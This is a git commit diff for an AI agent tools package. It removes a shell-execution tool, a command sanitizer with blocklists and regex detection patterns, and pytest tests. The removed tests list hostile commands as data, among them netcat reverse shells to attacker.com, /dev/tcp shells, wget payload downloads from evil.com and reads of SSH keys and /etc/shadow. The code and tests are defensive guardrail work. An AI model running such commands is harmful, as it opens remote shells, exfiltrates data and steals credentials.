feat: tools config frontend grouping and tools cleanup

This commit is contained in:
Richard Tang
2026-05-01 15:28:40 -07:00
parent 8c36b1575c
commit 12ffacccab
24 changed files with 125 additions and 1534 deletions
+2 -8
View File
@@ -72,10 +72,7 @@ verbatim; system + credential paths are on a deny list).
| `read_file` | Read file contents (with optional hashline anchors) |
| `write_file` | Create or overwrite a file |
| `edit_file` | Find/replace with fuzzy fallback |
| `hashline_edit` | Anchor-based structural edits validated by line hashes |
| `apply_patch` | Apply a diff_match_patch text |
| `search_files` | Grep file contents (`target='content'`) or list/find files (`target='files'`) — replaces grep, find, and ls |
| `execute_command_tool` | Execute shell commands |
| `save_data` / `load_data` | Persist and retrieve structured data across steps |
| `serve_file_to_user` | Serve a file for the user to download |
| `list_data_files` | List persisted data files in the session |
@@ -176,11 +173,8 @@ tools/
│ ├── file_ops.py # ALL file tools (read, write, edit, hashline_edit, search_files, apply_patch)
│ ├── credentials/ # Credential management
│ └── tools/ # Tool implementations
│ ├── example_tool/
├── file_system_toolkits/ # Shell only — file tools moved to file_ops.py
│ │ ├── security.py
│ │ ├── command_sanitizer.py
│ │ └── execute_command_tool/
│ ├── file_system_toolkits/ # Sandbox path helpers (security.py)
│ └── security.py
│ ├── web_search_tool/
│ ├── web_scrape_tool/
│ ├── pdf_read_tool/
-6
View File
@@ -59,11 +59,7 @@ from .docker_hub_tool import register_tools as register_docker_hub
from .duckduckgo_tool import register_tools as register_duckduckgo
from .email_tool import register_tools as register_email
from .exa_search_tool import register_tools as register_exa_search
from .example_tool import register_tools as register_example
from .excel_tool import register_tools as register_excel
from .file_system_toolkits.execute_command_tool import (
register_tools as register_execute_command,
)
from .freshdesk_tool import register_tools as register_freshdesk
from .github_tool import register_tools as register_github
from .gitlab_tool import register_tools as register_gitlab
@@ -157,7 +153,6 @@ def _register_verified(
"""Register verified (stable) tools."""
_verified_before = set(mcp._tool_manager._tools.keys())
# --- No credentials ---
register_example(mcp)
if register_web_scrape:
register_web_scrape(mcp)
register_pdf_read(mcp)
@@ -199,7 +194,6 @@ def _register_verified(
# defaults to CWD here; framework callers that own a session-specific
# workspace should call register_file_tools directly with home set.
register_file_tools(mcp)
register_execute_command(mcp)
register_csv(mcp)
register_excel(mcp)
@@ -1,26 +0,0 @@
# Example Tool
A template tool demonstrating the Aden tools pattern.
## Description
This tool processes text messages with optional transformations. It serves as a reference implementation for creating new tools using the FastMCP decorator pattern.
## Arguments
| Argument | Type | Required | Default | Description |
|----------|------|----------|---------|-------------|
| `message` | str | Yes | - | The message to process (1-1000 chars) |
| `uppercase` | bool | No | `False` | Convert message to uppercase |
| `repeat` | int | No | `1` | Number of times to repeat (1-10) |
## Environment Variables
This tool does not require any environment variables.
## Error Handling
Returns error strings for validation issues:
- `Error: message must be 1-1000 characters` - Empty or too long message
- `Error: repeat must be 1-10` - Repeat value out of range
- `Error processing message: <error>` - Unexpected error
@@ -1,5 +0,0 @@
"""Example Tool package."""
from .example_tool import register_tools
__all__ = ["register_tools"]
@@ -1,52 +0,0 @@
"""
Example Tool - A simple text processing tool for FastMCP.
Demonstrates native FastMCP tool registration pattern.
"""
from __future__ import annotations
from fastmcp import FastMCP
def register_tools(mcp: FastMCP) -> None:
"""Register example tools with the MCP server."""
@mcp.tool()
def example_tool(
message: str,
uppercase: bool = False,
repeat: int = 1,
) -> str:
"""
A simple example tool that processes text messages.
Use this tool when you need to transform or repeat text.
Args:
message: The message to process (1-1000 chars)
uppercase: If True, convert the message to uppercase
repeat: Number of times to repeat the message (1-10)
Returns:
The processed message string
"""
try:
# Validate inputs
if not message or len(message) > 1000:
return "Error: message must be 1-1000 characters"
if repeat < 1 or repeat > 10:
return "Error: repeat must be 1-10"
# Process the message
result = message
if uppercase:
result = result.upper()
# Repeat if requested
if repeat > 1:
result = " ".join([result] * repeat)
return result
except Exception as e:
return f"Error processing message: {str(e)}"
@@ -1,16 +1,15 @@
# File System Toolkits (post-consolidation)
This package now contains only the shell tool. **All file tools live in
`aden_tools.file_ops`** (read_file, write_file, edit_file, hashline_edit,
search_files, apply_patch) — they share one path policy and one home dir.
This package contains only sandbox path helpers used by `csv_tool` and
`excel_tool`. **All file tools live in `aden_tools.file_ops`** (read_file,
write_file, edit_file, hashline_edit, search_files, apply_patch) — they
share one path policy and one home dir.
## Sub-modules
| Module | Description |
|--------|-------------|
| `execute_command_tool/` | Shell command execution with sanitization (run_command, bash_kill, bash_output) |
| `command_sanitizer.py` | Validates and sanitizes shell command strings |
| `security.py` | Sandbox path resolver still used by execute_command_tool |
| `security.py` | Sandbox path resolver used by csv_tool and excel_tool |
## File tools
@@ -31,11 +30,3 @@ from aden_tools.file_ops import register_file_tools
register_file_tools(mcp, home="/path/to/agent/home")
```
For shell:
```python
from aden_tools.tools.file_system_toolkits.execute_command_tool import register_tools as register_shell
register_shell(mcp)
```
@@ -1,202 +0,0 @@
"""Command sanitization to prevent shell injection attacks.
Validates commands against a blocklist of dangerous patterns before they
are passed to subprocess.run(shell=True). This prevents prompt injection
attacks from tricking AI agents into running destructive or exfiltration
commands on the host system.
Design: uses a blocklist (not allowlist) so agents can run arbitrary
dev commands (uv, pytest, git, etc.) while blocking known-dangerous ops.
This blocks explicit nested shell executables (bash, sh, pwsh, etc.),
but callers still execute via shell=True, so shell parsing remains a
known limitation of this guardrail.
"""
import re
__all__ = ["CommandBlockedError", "validate_command"]
class CommandBlockedError(Exception):
"""Raised when a command is blocked by the safety filter."""
pass
# ---------------------------------------------------------------------------
# Blocklists
# ---------------------------------------------------------------------------
# Executables / prefixes that are never safe for an AI agent to invoke.
# Matched against each segment of a compound command (split on ; | && ||).
_BLOCKED_EXECUTABLES: list[str] = [
# Network exfiltration
"wget",
"nc",
"ncat",
"netcat",
"nmap",
"ssh",
"scp",
"sftp",
"ftp",
"telnet",
"rsync",
# Windows network tools
"invoke-webrequest",
"invoke-restmethod",
"iwr",
"irm",
"certutil",
# User / privilege escalation
"useradd",
"userdel",
"usermod",
"adduser",
"deluser",
"passwd",
"chpasswd",
"visudo",
"net", # net user, net localgroup, etc.
# System destructive
"shutdown",
"reboot",
"halt",
"poweroff",
"init",
"systemctl",
"mkfs",
"fdisk",
"diskpart",
"format", # Windows format
# Reverse shell / code exec wrappers
"bash",
"sh",
"zsh",
"dash",
"csh",
"ksh",
"powershell",
"pwsh",
"cmd",
"cmd.exe",
"wscript",
"cscript",
"mshta",
"regsvr32",
# Credential / secret access
"security", # macOS keychain: security find-generic-password
]
# Patterns matched against the full (joined) command string.
# These catch dangerous flags and argument combos even when the
# executable itself isn't blocked (e.g. python -c '...').
_BLOCKED_PATTERNS: list[re.Pattern[str]] = [
# rm with force/recursive flags targeting root or broad paths
re.compile(r"\brm\s+(-[rRf]+\s+)*(/|~|\.\.|C:\\)", re.IGNORECASE),
# del /s /q (Windows recursive delete)
re.compile(r"\bdel\s+.*/[sS]", re.IGNORECASE),
re.compile(r"\brmdir\s+/[sS]", re.IGNORECASE),
# dd writing to disks/partitions
re.compile(r"\bdd\s+.*\bof=\s*/dev/", re.IGNORECASE),
# chmod 777 / chmod -R 777
re.compile(r"\bchmod\s+(-R\s+)?(777|666)\b", re.IGNORECASE),
# sudo — agents should never escalate privileges
re.compile(r"\bsudo\b", re.IGNORECASE),
# su — switch user
re.compile(r"\bsu\s+", re.IGNORECASE),
# ruby/perl with -e flag (inline code execution)
re.compile(r"\bruby\s+-e\b", re.IGNORECASE),
re.compile(r"\bperl\s+-e\b", re.IGNORECASE),
# powershell encoded commands
re.compile(r"\bpowershell\b.*-enc", re.IGNORECASE),
# Reverse shell patterns
re.compile(r"/dev/tcp/", re.IGNORECASE),
re.compile(r"\bmkfifo\b", re.IGNORECASE),
# eval / exec as standalone commands
re.compile(r"^\s*eval\s+", re.IGNORECASE | re.MULTILINE),
re.compile(r"^\s*exec\s+", re.IGNORECASE | re.MULTILINE),
# Reading well-known secret files
re.compile(r"\bcat\s+.*(\.ssh|/etc/shadow|/etc/passwd|credential_key)", re.IGNORECASE),
re.compile(r"\btype\s+.*credential_key", re.IGNORECASE),
# Backtick or $() command substitution containing blocked executables
re.compile(r"\$\(.*\b(wget|nc|ncat)\b.*\)", re.IGNORECASE),
re.compile(r"`.*\b(wget|nc|ncat)\b.*`", re.IGNORECASE),
# Environment variable exfiltration via echo/print
re.compile(r"\becho\s+.*\$\{?.*(API_KEY|SECRET|TOKEN|PASSWORD|CREDENTIAL)", re.IGNORECASE),
# >& /dev/tcp (bash reverse shell)
re.compile(r">&\s*/dev/tcp", re.IGNORECASE),
]
# Shell operators used to split compound commands.
# We check each segment individually against _BLOCKED_EXECUTABLES.
_SHELL_SPLIT_PATTERN = re.compile(r"\s*(?:;|&&|\|\||\|)\s*")
def _normalize_executable_name(token: str) -> str:
"""Normalize executable names for matching (e.g. cmd.exe -> cmd)."""
normalized = token.lower().strip("\"'")
normalized = re.split(r"[\\/]", normalized)[-1]
if normalized.endswith(".exe"):
return normalized[:-4]
return normalized
def _extract_executable(segment: str) -> str:
"""Extract the first token (executable) from a command segment.
Strips environment variable assignments (FOO=bar) from the front.
"""
segment = segment.strip()
# Skip env var assignments at the start: VAR=value cmd ...
tokens = segment.split()
for token in tokens:
if "=" in token and not token.startswith("-"):
continue
# Return lowercase for case-insensitive matching
return _normalize_executable_name(token)
return ""
def validate_command(command: str) -> None:
"""Validate a command string against the safety blocklists.
Args:
command: The shell command string to validate.
Raises:
CommandBlockedError: If the command matches any blocked pattern.
"""
if not command or not command.strip():
return
stripped = command.strip()
# --- Check full-command patterns ---
for pattern in _BLOCKED_PATTERNS:
match = pattern.search(stripped)
if match:
raise CommandBlockedError(
f"Command blocked for safety: matched dangerous pattern '{match.group()}'. "
f"If this is a false positive, please modify the command."
)
# --- Check each segment for blocked executables ---
segments = _SHELL_SPLIT_PATTERN.split(stripped)
for segment in segments:
segment = segment.strip()
if not segment:
continue
executable = _extract_executable(segment)
# Check exact match and prefix-before-dot (e.g. mkfs.ext4 -> mkfs)
names_to_check = {executable}
if "." in executable:
names_to_check.add(executable.split(".")[0])
if names_to_check & set(_BLOCKED_EXECUTABLES):
matched = (names_to_check & set(_BLOCKED_EXECUTABLES)).pop()
raise CommandBlockedError(
f"Command blocked for safety: '{matched}' is not allowed. "
f"Blocked categories: network tools, privilege escalation, "
f"system destructive commands, shell interpreters."
)
@@ -1,152 +0,0 @@
# Execute Command Tool
Executes shell commands within the secure session sandbox.
## Description
The `execute_command_tool` allows you to run arbitrary shell commands in a sandboxed environment. Commands are executed with a 60-second timeout and capture both stdout and stderr output.
## Use Cases
- Running build commands (npm build, make, etc.)
- Executing tests
- Running linters or formatters
- Performing git operations
- Installing dependencies
## Usage
```python
execute_command_tool(
command="npm install",
workspace_id="workspace-123",
agent_id="agent-456",
session_id="session-789",
cwd="project"
)
```
## Arguments
| Argument | Type | Required | Default | Description |
|----------|------|----------|---------|-------------|
| `command` | str | Yes | - | The shell command to execute |
| `workspace_id` | str | Yes | - | The ID of the workspace |
| `agent_id` | str | Yes | - | The ID of the agent |
| `session_id` | str | Yes | - | The ID of the current session |
| `cwd` | str | No | "." | The working directory for the command (relative to session root) |
## Returns
Returns a dictionary with the following structure:
**Success:**
```python
{
"success": True,
"command": "npm install",
"return_code": 0,
"stdout": "added 42 packages in 3s",
"stderr": "",
"cwd": "project"
}
```
**Command failure (non-zero exit):**
```python
{
"success": True, # Command executed successfully, but exited with error code
"command": "npm test",
"return_code": 1,
"stdout": "",
"stderr": "Error: Tests failed",
"cwd": "."
}
```
**Timeout:**
```python
{
"error": "Command timed out after 60 seconds"
}
```
**Error:**
```python
{
"error": "Failed to execute command: [error message]"
}
```
## Error Handling
- Returns an error dict if the command times out (60 second limit)
- Returns an error dict if the command cannot be executed
- Returns success with non-zero return_code if command runs but fails
- Commands are executed in a sandboxed session environment
- Working directory defaults to session root if not specified
## Security Considerations
- Commands are executed within the session sandbox only
- File access is restricted to the session directory
- Network access depends on sandbox configuration
- Commands run with the permissions of the session user
- Use with caution as shell injection is possible
## Examples
### Running a build command
```python
result = execute_command_tool(
command="npm run build",
workspace_id="ws-1",
agent_id="agent-1",
session_id="session-1",
cwd="frontend"
)
# Returns: {"success": True, "return_code": 0, "stdout": "Build complete", ...}
```
### Running tests with output
```python
result = execute_command_tool(
command="pytest -v",
workspace_id="ws-1",
agent_id="agent-1",
session_id="session-1"
)
# Returns: {"success": True, "return_code": 0, "stdout": "test output...", "stderr": ""}
```
### Handling command failures
```python
result = execute_command_tool(
command="nonexistent-command",
workspace_id="ws-1",
agent_id="agent-1",
session_id="session-1"
)
# Returns: {"success": True, "return_code": 127, "stderr": "command not found", ...}
```
### Running git commands
```python
result = execute_command_tool(
command="git status",
workspace_id="ws-1",
agent_id="agent-1",
session_id="session-1",
cwd="repo"
)
# Returns: {"success": True, "return_code": 0, "stdout": "On branch main...", ...}
```
## Notes
- 60-second timeout for all commands
- Commands are executed using shell=True (supports pipes, redirects, etc.)
- Both stdout and stderr are captured separately
- Return code 0 typically indicates success
- Working directory is created if it doesn't exist
- Command output is returned as text (UTF-8 encoding)
@@ -1,3 +0,0 @@
from .execute_command_tool import register_tools
__all__ = ["register_tools"]
@@ -1,211 +0,0 @@
"""In-process registry of long-running shell jobs spawned by
``execute_command_tool(run_in_background=True)``.
Jobs are keyed on a short id the tool returns to the agent. The agent
can then call ``bash_output(id=...)`` to poll for new output and
``bash_kill(id=...)`` to terminate. Each job is scoped to an
``agent_id`` so two agents sharing the same MCP server can't see or
kill each other's work.
The stdout/stderr buffers are bounded rolling tail buffers (64 KB each)
so a runaway process can't exhaust memory. Older bytes are dropped with
a one-time ``[truncated N bytes]`` marker prepended to the returned
text.
"""
from __future__ import annotations
import asyncio
import time
from collections import deque
from dataclasses import dataclass, field
from uuid import uuid4
# 64 KB rolling window per stream. Large enough for long build logs,
# small enough that a bash infinite loop can't OOM the MCP process.
_MAX_BUFFER_BYTES = 64 * 1024
@dataclass
class _RingBuffer:
"""Append-only byte buffer with a hard byte ceiling and per-read
offset tracking so each bash_output call only returns new bytes.
"""
max_bytes: int = _MAX_BUFFER_BYTES
# deque of (global_offset, bytes) chunks. global_offset is the total
# bytes written prior to this chunk; lets us compute "bytes since
# last poll" without copying.
_chunks: deque[tuple[int, bytes]] = field(default_factory=deque)
_total_written: int = 0
_total_dropped: int = 0
_read_cursor: int = 0
def write(self, data: bytes) -> None:
if not data:
return
self._chunks.append((self._total_written, data))
self._total_written += len(data)
# Evict from the front until we're under the ceiling.
current_bytes = sum(len(c) for _, c in self._chunks)
while current_bytes > self.max_bytes and self._chunks:
dropped_offset, dropped = self._chunks.popleft()
self._total_dropped += len(dropped)
current_bytes -= len(dropped)
# Push the read cursor forward if the reader was still
# pointing at bytes we just evicted.
if self._read_cursor < dropped_offset + len(dropped):
self._read_cursor = dropped_offset + len(dropped)
def read_new(self) -> str:
"""Return any bytes since the last call, as decoded text.
Includes a ``[truncated N bytes]`` prefix if rolling-window
eviction dropped any bytes the reader hadn't yet consumed.
"""
chunks_out: list[bytes] = []
cursor = self._read_cursor
for offset, chunk in self._chunks:
end = offset + len(chunk)
if end <= cursor:
continue
start_in_chunk = max(0, cursor - offset)
chunks_out.append(chunk[start_in_chunk:])
cursor = end
self._read_cursor = cursor
raw = b"".join(chunks_out)
text = raw.decode("utf-8", errors="replace")
# Surface eviction ONCE per poll so the agent knows to check
# the file system for larger logs instead of assuming it's got
# the full output.
if self._total_dropped > 0 and text:
text = f"[truncated {self._total_dropped} earlier bytes]\n" + text
return text
@dataclass
class BackgroundJob:
id: str
agent_id: str
command: str
cwd: str
started_at: float
process: asyncio.subprocess.Process
stdout_buf: _RingBuffer = field(default_factory=_RingBuffer)
stderr_buf: _RingBuffer = field(default_factory=_RingBuffer)
_pump_task: asyncio.Task | None = None
exit_code: int | None = None
def status(self) -> str:
if self.exit_code is not None:
return f"exited({self.exit_code})"
if self.process.returncode is not None:
# Not yet surfaced by the pump but already finished.
return f"exited({self.process.returncode})"
return "running"
# agent_id -> {job_id -> BackgroundJob}
_jobs: dict[str, dict[str, BackgroundJob]] = {}
_jobs_lock = asyncio.Lock()
def _short_id() -> str:
return uuid4().hex[:8]
async def _pump(job: BackgroundJob) -> None:
"""Drain the child process's stdout/stderr into the ring buffers."""
proc = job.process
async def _drain(stream: asyncio.StreamReader | None, buf: _RingBuffer) -> None:
if stream is None:
return
while True:
chunk = await stream.read(4096)
if not chunk:
return
buf.write(chunk)
await asyncio.gather(
_drain(proc.stdout, job.stdout_buf),
_drain(proc.stderr, job.stderr_buf),
)
job.exit_code = await proc.wait()
async def spawn(command: str, cwd: str, agent_id: str) -> BackgroundJob:
"""Start a subprocess in the background and register it. The caller
holds the job id returned from here and can poll via ``get()``.
"""
proc = await asyncio.create_subprocess_shell(
command,
cwd=cwd,
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
)
job = BackgroundJob(
id=_short_id(),
agent_id=agent_id,
command=command,
cwd=cwd,
started_at=time.time(),
process=proc,
)
# Start pumping IO in the background so the ring buffers stay warm
# even if the agent doesn't poll for a while.
job._pump_task = asyncio.create_task(_pump(job))
async with _jobs_lock:
_jobs.setdefault(agent_id, {})[job.id] = job
return job
async def get(agent_id: str, job_id: str) -> BackgroundJob | None:
async with _jobs_lock:
return _jobs.get(agent_id, {}).get(job_id)
async def kill(agent_id: str, job_id: str, grace_seconds: float = 3.0) -> str:
"""SIGTERM a background job, escalating to SIGKILL after a grace
period. Returns a human-readable status string.
"""
job = await get(agent_id, job_id)
if job is None:
return f"no background job with id '{job_id}'"
if job.process.returncode is not None:
status = f"already exited with code {job.process.returncode}"
else:
try:
job.process.terminate()
except ProcessLookupError:
pass
try:
await asyncio.wait_for(job.process.wait(), timeout=grace_seconds)
status = f"terminated cleanly (exit={job.process.returncode})"
except TimeoutError:
try:
job.process.kill()
except ProcessLookupError:
pass
await job.process.wait()
status = f"killed (SIGKILL, exit={job.process.returncode})"
# Deregister after kill so the id is no longer reachable.
async with _jobs_lock:
scope = _jobs.get(agent_id)
if scope is not None:
scope.pop(job_id, None)
return status
async def clear_agent(agent_id: str) -> None:
"""Test hook: kill every job owned by ``agent_id``."""
async with _jobs_lock:
scope = _jobs.pop(agent_id, {})
for job in scope.values():
if job.process.returncode is None:
try:
job.process.kill()
except ProcessLookupError:
pass
await job.process.wait()
@@ -1,222 +0,0 @@
"""Shell command execution tool.
Three tools are registered:
* ``execute_command_tool`` runs a command synchronously with a per-call
timeout (default 120s, max 600s). Uses ``asyncio.create_subprocess_shell``
so the MCP event loop is not blocked while the child runs.
* ``bash_output`` polls a background job started with
``execute_command_tool(run_in_background=True)`` and returns any new
stdout/stderr since the last poll plus the current status.
* ``bash_kill`` terminates a background job (SIGTERM then SIGKILL after
a 3-second grace period).
All three go through the same pre-execution safety blocklist in
``command_sanitizer.py``.
"""
from __future__ import annotations
import asyncio
import os
import time
from mcp.server.fastmcp import FastMCP
from ..command_sanitizer import CommandBlockedError, validate_command
from ..security import AGENT_SANDBOXES_DIR, get_sandboxed_path
from .background_jobs import get as get_job, kill as kill_job, spawn as spawn_job
# Bounds on per-call timeout. 1s minimum prevents accidental zeros that
# would cause every command to fail. 600s maximum (10 min) is the same
# ceiling Claude Code uses for its Bash tool; builds and test suites
# longer than that should use run_in_background instead.
_MIN_TIMEOUT = 1
_MAX_TIMEOUT = 600
_DEFAULT_TIMEOUT = 120
def _resolve_cwd(cwd: str | None, agent_id: str) -> str:
agent_root = os.path.join(AGENT_SANDBOXES_DIR, agent_id, "current")
os.makedirs(agent_root, exist_ok=True)
if cwd:
return get_sandboxed_path(cwd, agent_id)
return agent_root
def register_tools(mcp: FastMCP) -> None:
"""Register command execution tools with the MCP server."""
@mcp.tool()
async def execute_command_tool(
command: str,
agent_id: str,
cwd: str | None = None,
timeout_seconds: int = _DEFAULT_TIMEOUT,
run_in_background: bool = False,
) -> dict:
"""
Purpose
Execute a shell command within the agent sandbox.
When to use
Run validators, linters, builds, test suites
Generate derived artifacts (indexes, summaries)
Perform controlled maintenance tasks
Start long-running processes via ``run_in_background=True``
(dev servers, watchers, file-triggered builds)
Rules & Constraints
No network access unless explicitly allowed
No destructive commands (rm -rf, system modification)
Commands are validated against a safety blocklist before
execution. The blocklist runs through shell=True, so it
only prevents explicit nested shell executables.
timeout_seconds is clamped to [1, 600]. For longer-running
work use run_in_background=True + bash_output to poll.
Args:
command: The shell command to execute.
agent_id: The ID of the agent (auto-injected).
cwd: Working directory for the command (relative to the
agent sandbox). Defaults to the sandbox root.
timeout_seconds: Max wall-clock seconds the foreground
command is allowed to run. Ignored when
run_in_background=True. Default 120, max 600.
run_in_background: If True, spawn the command and return
immediately with a job id. Use bash_output(id=...) to
read output and bash_kill(id=...) to stop it.
Returns:
For foreground commands: dict with stdout, stderr, return_code,
elapsed_seconds.
For background commands: dict with id, pid, started_at, and
instructions for polling / killing the job.
On error: dict with an "error" key.
"""
try:
validate_command(command)
except CommandBlockedError as e:
return {"error": f"Command blocked: {e}", "blocked": True}
try:
secure_cwd = _resolve_cwd(cwd, agent_id)
except Exception as e:
return {"error": f"Failed to resolve cwd: {e}"}
if run_in_background:
try:
job = await spawn_job(command, secure_cwd, agent_id)
except Exception as e:
return {"error": f"Failed to spawn background job: {e}"}
return {
"success": True,
"background": True,
"id": job.id,
"pid": job.process.pid,
"command": command,
"cwd": cwd or ".",
"started_at": job.started_at,
"hint": (
"Background job started. Call "
f"bash_output(id='{job.id}') to read output, or "
f"bash_kill(id='{job.id}') to terminate it."
),
}
# Foreground path: clamp timeout, spawn, wait with a watchdog.
try:
timeout = max(_MIN_TIMEOUT, min(_MAX_TIMEOUT, int(timeout_seconds)))
except (TypeError, ValueError):
timeout = _DEFAULT_TIMEOUT
started = time.monotonic()
try:
proc = await asyncio.create_subprocess_shell(
command,
cwd=secure_cwd,
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
)
except Exception as e:
return {"error": f"Failed to execute command: {e}"}
try:
stdout_b, stderr_b = await asyncio.wait_for(proc.communicate(), timeout=timeout)
except TimeoutError:
# Child is still running: kill it, drain what it already
# wrote so the agent gets a partial log, then report.
try:
proc.kill()
except ProcessLookupError:
pass
try:
stdout_b, stderr_b = await asyncio.wait_for(proc.communicate(), timeout=2.0)
except (TimeoutError, Exception):
stdout_b, stderr_b = b"", b""
elapsed = round(time.monotonic() - started, 2)
return {
"error": (
f"Command timed out after {timeout} seconds. "
f"For longer work pass timeout_seconds (max 600) or "
f"run_in_background=True."
),
"timed_out": True,
"elapsed_seconds": elapsed,
"stdout": stdout_b.decode("utf-8", errors="replace"),
"stderr": stderr_b.decode("utf-8", errors="replace"),
}
except Exception as e:
return {"error": f"Failed while running command: {e}"}
return {
"success": True,
"command": command,
"return_code": proc.returncode,
"stdout": stdout_b.decode("utf-8", errors="replace"),
"stderr": stderr_b.decode("utf-8", errors="replace"),
"cwd": cwd or ".",
"elapsed_seconds": round(time.monotonic() - started, 2),
}
@mcp.tool()
async def bash_output(id: str, agent_id: str) -> dict:
"""Poll a background command for new output and its current status.
Returns any stdout/stderr bytes written since the last call.
The status is one of "running", "exited(N)", or "killed".
When the job has finished and all output has been consumed, it
is removed from the registry on the next poll.
Args:
id: The job id returned from
execute_command_tool(run_in_background=True).
agent_id: The ID of the agent (auto-injected).
"""
job = await get_job(agent_id, id)
if job is None:
return {"error": f"no background job with id '{id}'"}
new_stdout = job.stdout_buf.read_new()
new_stderr = job.stderr_buf.read_new()
return {
"id": id,
"status": job.status(),
"stdout": new_stdout,
"stderr": new_stderr,
"elapsed_seconds": round(time.time() - job.started_at, 2),
}
@mcp.tool()
async def bash_kill(id: str, agent_id: str) -> dict:
"""Terminate a background command.
Sends SIGTERM, waits up to 3 seconds, then escalates to SIGKILL
if the process is still alive. The job id is then deregistered.
Args:
id: The job id returned from
execute_command_tool(run_in_background=True).
agent_id: The ID of the agent (auto-injected).
"""
status = await kill_job(agent_id, id)
return {"id": id, "status": status}
-238
View File
@@ -1,238 +0,0 @@
"""Tests for command_sanitizer — validates that dangerous commands are blocked
while normal development commands pass through unmodified."""
import pytest
from aden_tools.tools.file_system_toolkits.command_sanitizer import (
CommandBlockedError,
validate_command,
)
# ---------------------------------------------------------------------------
# Safe commands that MUST pass validation
# ---------------------------------------------------------------------------
class TestSafeCommands:
"""Common dev commands that should never be blocked."""
@pytest.mark.parametrize(
"cmd",
[
"echo hello",
"echo 'Hello World'",
"uv run pytest tests/ -v",
"uv pip install requests",
"git status",
"git diff --cached",
"git log -n 5",
"git add .",
"git commit -m 'fix: typo'",
"python script.py",
"python -m pytest",
"python3 script.py",
"python manage.py migrate",
"ls -la",
"dir /a",
"cat README.md",
"head -n 20 file.py",
"tail -f log.txt",
"grep -r 'pattern' src/",
"find . -name '*.py'",
"ruff check .",
"ruff format --check .",
"mypy src/",
"npm install",
"npm run build",
"npm test",
"node server.js",
"make test",
"make check",
"cargo build",
"go build ./...",
"dotnet build",
"pip install -r requirements.txt",
"cd src && ls",
"echo hello && echo world",
"cat file.py | grep pattern",
"pytest tests/ -v --tb=short",
"rm temp.txt",
"rm -f temp.log",
"del temp.txt",
"mkdir -p output/logs",
"cp file1.py file2.py",
"mv old.txt new.txt",
"wc -l *.py",
"sort output.txt",
"diff file1.py file2.py",
"tree src/",
"curl https://api.example.com/data",
"curl -X POST -H 'Content-Type: application/json' https://api.example.com",
],
)
def test_safe_command_passes(self, cmd):
"""Should not raise for common dev commands."""
validate_command(cmd) # should not raise
def test_empty_command(self):
"""Empty and whitespace-only commands should pass."""
validate_command("")
validate_command(" ")
validate_command(None) # type: ignore[arg-type] — edge case
# ---------------------------------------------------------------------------
# Dangerous commands that MUST be blocked
# ---------------------------------------------------------------------------
class TestBlockedExecutables:
"""Commands using blocked executables should raise CommandBlockedError."""
@pytest.mark.parametrize(
"cmd",
[
# Network exfiltration
"wget http://evil.com/payload",
"nc -e /bin/sh attacker.com 4444",
"ncat attacker.com 1234",
"nmap -sS 192.168.1.0/24",
"ssh user@remote",
"scp file.txt user@remote:/tmp/",
"ftp ftp.example.com",
"telnet example.com 80",
"rsync -avz . user@remote:/data",
# Windows network tools
"invoke-webrequest https://evil.com",
"iwr https://evil.com",
"certutil -urlcache -split -f http://evil.com/payload",
# User escalation
"useradd hacker",
"userdel admin",
"adduser hacker",
"passwd root",
"net user hacker P@ss123 /add",
"net localgroup administrators hacker /add",
# System destructive
"shutdown /s /t 0",
"reboot",
"halt",
"poweroff",
"mkfs.ext4 /dev/sda1",
"diskpart",
# Shell interpreters (direct invocation)
"bash -c 'echo hacked'",
"sh -c 'rm -rf /'",
"powershell -Command Get-Process",
"pwsh -c 'ls'",
"cmd /c dir",
"cmd.exe /c dir",
],
)
def test_blocked_executable(self, cmd):
"""Should raise CommandBlockedError for dangerous executables."""
with pytest.raises(CommandBlockedError):
validate_command(cmd)
class TestBlockedPatterns:
"""Commands matching dangerous patterns should be blocked."""
@pytest.mark.parametrize(
"cmd",
[
# Recursive delete of root / home
"rm -rf /",
"rm -rf ~",
"rm -rf ..",
"rm -rf C:\\",
"rm -f -r /",
# sudo
"sudo apt install something",
"sudo rm -rf /var/log",
# Reverse shell indicators
"bash -i >& /dev/tcp/10.0.0.1/4444",
# Credential theft
"cat ~/.ssh/id_rsa",
"cat /etc/shadow",
"cat something/credential_key",
"type something\\credential_key",
# Command substitution with dangerous tools
"echo `wget http://evil.com`",
# Environment variable exfiltration
"echo $API_KEY",
"echo ${SECRET_TOKEN}",
],
)
def test_blocked_pattern(self, cmd):
"""Should raise CommandBlockedError for dangerous patterns."""
with pytest.raises(CommandBlockedError):
validate_command(cmd)
class TestChainedCommands:
"""Dangerous commands hidden in compound statements should be caught."""
@pytest.mark.parametrize(
"cmd",
[
"echo hi && wget http://evil.com/payload",
"echo hi || ssh attacker@remote",
"ls | nc attacker.com 4444",
"echo safe; bash -c 'evil stuff'",
"git status; shutdown /s /t 0",
],
)
def test_chained_dangerous_command(self, cmd):
"""Dangerous commands chained with safe ones should be blocked."""
with pytest.raises(CommandBlockedError):
validate_command(cmd)
class TestEdgeCases:
"""Edge cases and possible bypass attempts."""
def test_env_var_prefix_does_not_bypass(self):
"""FOO=bar wget ... should still be blocked."""
with pytest.raises(CommandBlockedError):
validate_command("FOO=bar wget http://evil.com")
@pytest.mark.parametrize(
"cmd",
[
"/usr/bin/wget https://attacker.com",
"C:\\Windows\\System32\\cmd.exe /c dir",
],
)
def test_directory_prefix_does_not_bypass(self, cmd):
"""Absolute executable paths should still match the blocklist."""
with pytest.raises(CommandBlockedError):
validate_command(cmd)
def test_case_insensitive_blocking(self):
"""Blocking should be case-insensitive."""
with pytest.raises(CommandBlockedError):
validate_command("Wget http://evil.com")
def test_exe_suffix_stripped(self):
"""cmd.exe should be blocked same as cmd."""
with pytest.raises(CommandBlockedError):
validate_command("cmd.exe /c dir")
def test_safe_rm_without_dangerous_target(self):
"""rm of a specific file (not root/home) should pass."""
validate_command("rm temp.txt")
validate_command("rm -f output.log")
def test_python_commands_are_safe(self):
"""python commands (including -c) are allowed for agent scripting."""
validate_command("python script.py")
validate_command("python -m pytest tests/")
validate_command("python3 -c 'print(1)'")
validate_command("python -c 'import json; print(json.dumps({}))'")
validate_command("node -e 'console.log(1)'")
def test_error_message_is_descriptive(self):
"""Blocked commands should include a useful error message."""
with pytest.raises(CommandBlockedError, match="blocked for safety"):
validate_command("wget http://evil.com")
+6 -4
View File
@@ -56,10 +56,12 @@ async def reproduce_agent_session(session: BrowserSession):
print("=" * 100)
total_start = time.time()
# ── Turn 1 (seq 1-2): browser_start ──────────────────────────────────
# ── Turn 1 (seq 1-2): session start ──────────────────────────────────
